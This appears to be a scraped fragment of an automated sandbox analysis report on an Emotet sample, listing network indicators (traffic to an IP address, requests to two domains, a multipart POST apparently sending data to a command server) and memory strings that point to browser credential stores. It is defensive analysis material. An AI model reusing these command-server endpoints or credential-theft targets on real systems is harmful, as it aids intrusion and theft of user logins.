Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13

Source: global traffic	HTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1Host: jkncrew.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1Host: jmlandscapingservice.comConnection: Keep-Alive

Source: utildll.exe, 00000012.00000002.377512445.0000000000B29000.00000004.00000040.sdmp	String found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.12917.8592.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: utildll.exe, 00000012.00000002.377512445.0000000000B29000.00000004.00000040.sdmp	String found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.12917.8592.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: utildll.exe, 00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp, utildll.exe, 00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: utildll.exe, 00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp, utildll.exe, 00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: utildll.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: jkncrew.com

Source: unknown

HTTP traffic detected: POST /JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/ HTTP/1.1Referer: http://185.94.252.13/JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/Content-Type: multipart/form-data; boundary=---------------------------303308476707525User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache

Source: utildll.exe, 00000007.00000002.521164641.0000000002AB2000.00000004.00000001.sdmp

String found

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

Spreading:

Software Vulnerabilities:

Networking: